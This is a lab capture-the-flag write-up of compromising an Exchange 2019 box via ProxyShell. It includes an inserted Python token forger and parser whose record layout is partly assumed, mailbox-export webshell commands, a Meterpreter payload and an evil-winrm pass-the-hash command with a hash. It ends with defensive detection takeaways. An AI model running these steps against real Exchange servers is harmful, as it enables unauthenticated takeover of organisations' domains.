Myles Nieman

Logonshell

Overview

Logonshell is a very easy Windows box hosting Microsoft Exchange Server 2019 RTM (version 15.2.221.12) on the domain edelweiss.htb, with Exchange installed on the domain controller itself (dc.edelweiss.htb). That build is vulnerable to ProxyShell (CVE-2021-34473 / CVE-2021-34523 / CVE-2021-31207): a pre-auth path confusion in the front-end proxy that gives SSRF into the backend, a privilege elevation on the Exchange PowerShell backend, and a post-auth arbitrary file write via mailbox export, which together yield unauthenticated RCE. The bypass is used to forge a token the PowerShell backend accepts as Administrator@edelweiss.htb, a mailbox export drops an ASPX webshell into the web root, and a Metasploit module turns that webshell into a Meterpreter session. The Administrator NTLM hash recovered from that session is then used with evil-winrm for a stable session.

Path: Exchange 2019 RTM → ProxyShell auth bypass → forged backend token for Administrator → mailbox export webshell → Meterpreter shell → evil-winrm (pass-the-hash) → Administrator.

Enumeration

The target exposes a large number of ports consistent with an Exchange server that is also a domain controller: Kerberos (88, 464), LDAP and Global Catalog (389, 636, 3268, 3269) and SMB/RPC (135, 139, 445, 593) sit alongside the mail and web services (25, 465, 587, 80, 443) and the Exchange Back End website on 81 and 444.

$ nmap 10.129.227.141 -sV
PORT     STATE SERVICE
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
81/tcp   open  hosts2-ns
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
443/tcp  open  https
444/tcp  open  snpp
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
465/tcp  open  smtps
587/tcp  open  submission
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
808/tcp  open  ccproxy-http
1801/tcp open  msmq
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl

Nmap initial port scan results

Browsing to https://10.129.227.141/owa/auth/logon.aspx confirms an Outlook Web Access login page. Its 2011 Microsoft copyright hints at Exchange 2010 era styling, but the copyright string in the logon template is not a reliable version indicator; the exchange_proxyshell.py script reports the real build:

$ python3 exchange_proxyshell.py -u https://10.129.227.141
[+] Exchange Backend Servers: ['dc.edelweiss.htb']
[+]     dc.edelweiss.htb - version: 15.2.221.12
[+]     dc.edelweiss.htb - version_short: Exchange Server 2019 RTM
[+]     dc.edelweiss.htb - user: NT AUTHORITY\SYSTEM

The domain is edelweiss.htb, the server is dc.edelweiss.htb, and the Exchange build is 15.2.221.12 (Exchange Server 2019 RTM), well below the April and May 2021 security updates that fixed the three ProxyShell CVEs, so the server is squarely in the vulnerable range. The script also enumerates the accepted SMTP domains (edelweiss.htb, htb.) and surfaces the Administrator LegacyDN via Autodiscover, which is the input to the SID lookup step.

Foothold — ProxyShell (CVE-2021-34473)

ProxyLogon and a Metasploit ProxyShell module were tried first but both failed to obtain a usable shell:

Metasploit ProxyShell module failure

Metasploit ProxyLogon RCE failure

The exchange_proxyshell.py PoC from horizon3ai/proxyshell provides more control. It successfully enumerates users from Active Directory (including Administrator, Guest, krbtgt, anakin, and Exchange service accounts), walks the SID-lookup chain to resolve Administrator@edelweiss.htb to SID S-1-5-21-1677581083-3380853377-188903654-500, and forges a Common Access Token (CAT) for that SID, which the Exchange PowerShell backend accepts through the X-Rps-CAT parameter (CVE-2021-34523):

$ python3 exchange_proxyshell.py -u https://10.129.227.141
[+] Retrieved LegacyDN: /o=EDELWEISS/ou=Exchange Administrative Group .../cn=...Administrator
[+] Generated token for Administrator@edelweiss.htb - S-1-5-21-...-500
[+] Token: VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9z...
PS>
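The token the script prints is an Exchange Common Access Token (CAT), the serialized identity the front end normally attaches to proxied requests and which the PowerShell backend trusts when it arrives as the X-Rps-CAT parameter. The following Python is an added example, not code from the writeup or from the horizon3ai PoC: it serializes a CAT in the record layout that PoC uses (the V/T/C/A prefix is confirmed by the token above; the login, SID, group and extension records are reproduced from memory of the PoC and should be treated as an assumption), parses one back, and uses the parser to pick the forged identity out of a constructed IIS log line shaped like the PoC's request, which is the indicator a defender would hunt for.

```python
"""Forge and parse the Exchange Common Access Token (CAT) that ProxyShell hands to the
PowerShell backend as the X-Rps-CAT query parameter (CVE-2021-34523), then use the
parser to spot such a token in an IIS log line.  Added example, not the page's code."""
import base64
import struct
from typing import Optional
from urllib.parse import parse_qs, quote

WINDOWS, KERBEROS = b"Windows", b"Kerberos"
GROUP_ATTRS = 7  # assumption: mandatory | enabled-by-default | enabled, as the PoC sets it


def gen_cat(login: str, user_sid: str, groups=("S-1-5-32-544",)) -> str:
    """Serialise a CAT.  Layout follows the horizon3ai PoC; the V/T/C/A prefix is
    confirmed by the token the writeup prints, the remaining records are assumed."""
    raw = b"V" + bytes([1, 0])                                  # version 1.0
    raw += b"T" + bytes([len(WINDOWS)]) + WINDOWS               # token type
    raw += b"C" + bytes([0])                                    # not compressed
    raw += b"A" + bytes([len(KERBEROS)]) + KERBEROS             # claimed auth method
    raw += b"L" + bytes([len(login)]) + login.encode()          # logon name
    raw += b"U" + bytes([len(user_sid)]) + user_sid.encode()    # user SID
    raw += b"G" + struct.pack("<I", len(groups))                # group count, then per group
    for g in groups:                                            # attrs + length-prefixed SID
        raw += struct.pack("<I", GROUP_ATTRS) + bytes([len(g)]) + g.encode()
    raw += b"E" + struct.pack(">I", 0)                          # no extension data
    return base64.b64encode(raw).decode()


def parse_cat(token: str) -> dict:
    """Inverse of gen_cat: walk the tagged records and return the asserted identity."""
    raw = base64.b64decode(token)
    names = {b"T": "type", b"A": "auth", b"L": "login", b"U": "user_sid"}
    out, i = {}, 0
    while i < len(raw):
        tag = raw[i:i + 1]
        i += 1
        if tag == b"V":
            out["version"] = (raw[i], raw[i + 1])
            i += 2
        elif tag == b"C":
            out["compressed"] = bool(raw[i])
            i += 1
        elif tag in names:
            n = raw[i]
            out[names[tag]] = raw[i + 1:i + 1 + n].decode()
            i += 1 + n
        elif tag == b"G":
            count = struct.unpack("<I", raw[i:i + 4])[0]
            i += 4
            out["groups"] = []
            for _ in range(count):
                attrs = struct.unpack("<I", raw[i:i + 4])[0]
                n = raw[i + 4]
                out["groups"].append((raw[i + 5:i + 5 + n].decode(), attrs))
                i += 5 + n
        elif tag == b"E":
            n = struct.unpack(">I", raw[i:i + 4])[0]
            out["ext"] = raw[i + 4:i + 4 + n]
            i += 4 + n
        else:
            raise ValueError(f"unknown CAT record {tag!r} at offset {i - 1}")
    return out


def cat_from_iis_line(line: str) -> Optional[dict]:
    """Pull X-Rps-CAT out of the cs-uri-query field of a W3C IIS log line and decode it.
    Assumed field order: date time s-ip cs-method cs-uri-stem cs-uri-query ...
    No legitimate client sends X-Rps-CAT to the front end, so a hit is an indicator."""
    if line.startswith("#"):
        return None
    fields = line.split(" ")
    if len(fields) < 6:
        return None
    stem, query = fields[4], fields[5]
    token = parse_qs(query.split("?", 1)[-1]).get("X-Rps-CAT")
    if not token:
        return None
    cat = parse_cat(token[0])
    cat["stem"] = stem
    cat["is_admin"] = cat.get("user_sid", "").endswith("-500") or any(
        g == "S-1-5-32-544" for g, _ in cat.get("groups", []))
    return cat


# Constructed sample: the SID and principal from the writeup inside a made-up IIS log line
# shaped like the PoC's request (autodiscover path confusion into /powershell/).
ADMIN_SID = "S-1-5-21-1677581083-3380853377-188903654-500"
ADMIN_TOKEN = gen_cat("Administrator@edelweiss.htb", ADMIN_SID)
SAMPLE_IIS_LINE = (
    "2021-08-10 12:00:00 10.129.227.141 POST /autodiscover/autodiscover.json "
    "@edelweiss.htb/powershell/?X-Rps-CAT=" + quote(ADMIN_TOKEN, safe="")
    + "&Email=autodiscover/autodiscover.json%3F@edelweiss.htb "
    "443 - 10.10.14.5 python-requests/2.25.1 - 200 0 0 120"
)

if __name__ == "__main__":
    print(ADMIN_TOKEN[:32])                 # same prefix as the token in the writeup
    print(cat_from_iis_line(SAMPLE_IIS_LINE))
```

The forged token carries no signature at all; the backend's only check is whether the request came through the front end, which is exactly what the path confusion fakes. For detection, alert on any front-end request whose query contains X-Rps-CAT whether or not the token parses, and use the decoded login and SID to scope the incident.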

The resulting PS> prompt is a remote Exchange Management Shell session reached through the backend /powershell endpoint, so it is limited to the Exchange cmdlets that the Administrator's RBAC roles permit. The Mailbox Import Export role is not assigned to anyone by default, so it has to be granted first with New-ManagementRoleAssignment; the export request then writes a PST, named as an .aspx, into the web root:

PS> New-ManagementRoleAssignment -Role "Mailbox Import Export" -User Administrator@edelweiss.htb
# FilePath must be a UNC path; the server's own admin share reaches the local web root
PS> New-MailboxExportRequest -Mailbox Administrator@edelweiss.htb -IncludeFolders "#Drafts#" `
      -FilePath "\\localhost\C$\inetpub\wwwroot\aspnet_client\svjavxjxjjaqoyik.aspx" `
      -ContentFilter "Subject -eq 'svjavxjxjjaqoyik'"

The webshell is written to the aspnet_client directory via the mailbox export mechanism. This only works because a draft with subject svjavxjxjjaqoyik, whose body carries the ASPX payload, already sits in Administrator's Drafts folder (the PoC plants it before issuing the export; that step is not shown here), and because the PoC pre-encodes the payload so that it lands in the exported PST as plain ASPX source. The file is a PST with an .aspx name in a web-served directory, so IIS compiles and serves it like any other page. Switching the Metasploit payload to windows/x64/meterpreter/reverse_http and pointing the exploit at the placed webshell delivers a session:

Webshell confirmed written to disk during the export process

Metasploit session opens with the corrected payload

Meterpreter session active on the Exchange server

The Meterpreter session showed instability with the chosen payload:

Meterpreter session instability noted

Root

Rather than troubleshoot the Meterpreter session, the Administrator NTLM hash is recovered from it and used to authenticate directly with evil-winrm, which passes the hash over WinRM (with edelweiss.htb resolving to 10.129.227.141 via /etc/hosts):

$ evil-winrm -u Administrator -H f6b0de9c3fcb4522a273263d4adbfb16 -i edelweiss.htb

evil-winrm session as Administrator on edelweiss.htb

Domain Administrator access achieved.

Takeaways

  • ProxyShell (CVE-2021-34473/34523/31207) chains an unauthenticated SSRF with privilege elevation and a post-auth file write, making any unpatched internet-facing Exchange instance a pre-auth RCE target. Patch immediately or take Exchange off public exposure.
  • The mailbox export-to-webshell technique is a hallmark of ProxyShell exploitation and leaves distinctive artifacts: a MailboxExportRequest whose FilePath points into a web-served directory, and .aspx files under aspnet_client (or other Exchange virtual directories) that are really PST files. Either is worth alerting on.
  • A shaky Meterpreter session is still enough to dump credentials: the Administrator NTLM hash recovered from it gives a stable pass-the-hash session over WinRM with evil-winrm.